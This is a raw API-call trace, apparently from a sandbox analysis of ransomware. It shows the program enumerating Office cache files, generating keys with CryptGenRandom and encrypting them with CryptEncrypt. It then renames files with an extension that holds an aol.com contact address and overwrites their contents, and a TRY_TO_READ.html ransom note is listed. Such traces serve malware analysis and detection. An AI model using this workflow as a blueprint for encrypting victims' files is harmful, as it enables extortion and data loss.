	[0053.157] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.157] GetLastError () returned 0x0
	[0053.157] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.157] GetLastError () returned 0x0
	[0053.157] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.157] GetLastError () returned 0x0
	[0053.158] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0053.158] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.158] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.158] GetLastError () returned 0x0
	[0053.158] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e53510, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0053.158] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.158] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.158] GetLastError () returned 0x0
	[0053.158] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e53510, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db440
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0053.158] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0053.158] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0053.158] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0053.158] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0053.158] GetProcessHeap () returned 0x540000
	[0053.158] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db4e8
	[0053.158] lstrcpyW (in: lpString1=0x5db4e8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0053.159] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.159] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0053.161] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c
	[0053.161] GetProcessHeap () returned 0x540000
	[0053.161] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4e8 | out: hHeap=0x540000) returned 1
	[0053.161] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2296) returned 1
	[0053.161] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8f8
	[0053.161] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0053.161] GetProcessHeap () returned 0x540000
	[0053.161] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0053.161] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0053.161] WriteFile (in: hFile=0x45c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0053.435] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0053.435] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0053.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8f8) returned 0x5db4e8
	[0053.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8f8) returned 0x5dbde8
	[0053.435] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.435] ReadFile (in: hFile=0x45c, lpBuffer=0x5db4e8, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db4e8*, lpNumberOfBytesRead=0x3a1f778*=0x8f8, lpOverlapped=0x0) returned 1
	[0053.435] SetFilePointer (in: hFile=0x45c, lDistanceToMove=-2296, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.435] WriteFile (in: hFile=0x45c, lpBuffer=0x5dbde8*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbde8*, lpNumberOfBytesWritten=0x3a1f778*=0x8f8, lpOverlapped=0x0) returned 1
	[0053.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4e8 | out: hHeap=0x540000) returned 1
	[0053.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbde8 | out: hHeap=0x540000) returned 1
	[0053.435] CloseHandle (hObject=0x45c) returned 1
	[0053.497] GetProcessHeap () returned 0x540000
	[0053.497] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0053.498] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0053.498] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.498] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db440 | out: hHeap=0x540000) returned 1
	[0053.498] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db398 | out: hHeap=0x540000) returned 1
	[0053.498] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db398
	[0053.498] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0053.498] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0053.498] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0053.498] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0053.498] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", dwFileAttributes=0x80) returned 1
	[0053.499] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 76
	[0053.499] GetProcessHeap () returned 0x540000
	[0053.499] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0053.499] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml"
	[0053.499] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.499] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0053.502] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c
	[0053.502] GetProcessHeap () returned 0x540000
	[0053.502] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0053.502] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1565) returned 1
	[0053.502] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x61d
	[0053.502] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0053.503] GetProcessHeap () returned 0x540000
	[0053.503] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0053.503] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0053.504] WriteFile (in: hFile=0x45c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0053.514] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0053.515] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0053.515] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x61d) returned 0x5db440
	[0053.515] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x61d) returned 0x5dba68
	[0053.515] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.515] ReadFile (in: hFile=0x45c, lpBuffer=0x5db440, nNumberOfBytesToRead=0x61d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db440*, lpNumberOfBytesRead=0x3a1f778*=0x61d, lpOverlapped=0x0) returned 1
	[0053.515] SetFilePointer (in: hFile=0x45c, lDistanceToMove=-1565, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.515] WriteFile (in: hFile=0x45c, lpBuffer=0x5dba68*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dba68*, lpNumberOfBytesWritten=0x3a1f778*=0x61d, lpOverlapped=0x0) returned 1
	[0053.515] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db440 | out: hHeap=0x540000) returned 1
	[0053.515] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dba68 | out: hHeap=0x540000) returned 1
	[0053.515] CloseHandle (hObject=0x45c) returned 1
	[0053.516] GetProcessHeap () returned 0x540000
	[0053.516] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0053.516] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0053.516] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.516] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db398 | out: hHeap=0x540000) returned 1
	[0053.516] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2f0 | out: hHeap=0x540000) returned 1
	[0053.516] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db2f0
	[0053.516] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0053.516] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0053.516] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0053.516] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0053.516] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", dwFileAttributes=0x80) returned 1
	[0053.517] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 76
	[0053.517] GetProcessHeap () returned 0x540000
	[0053.517] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0053.517] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi"
	[0053.517] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.517] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0053.519] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c
	[0053.519] GetProcessHeap () returned 0x540000
	[0053.519] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0053.519] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2506240) returned 1
	[0053.519] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x263e00
	[0053.519] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0053.519] GetProcessHeap () returned 0x540000
	[0053.519] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0053.519] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0053.519] WriteFile (in: hFile=0x45c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0053.563] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0053.563] WriteFile (in: hFile=0x45c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0053.563] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x263e00) returned 0x3a20020
	[0053.564] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x263e00) returned 0x3c90020
	[0053.564] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.564] ReadFile (in: hFile=0x45c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x263e00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x263e00, lpOverlapped=0x0) returned 1
	[0053.728] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0053.728] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0053.728] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", dwFileAttributes=0x80) returned 1
	[0053.728] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 75
	[0053.728] GetProcessHeap () returned 0x540000
	[0053.728] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0053.728] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab"
	[0053.728] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
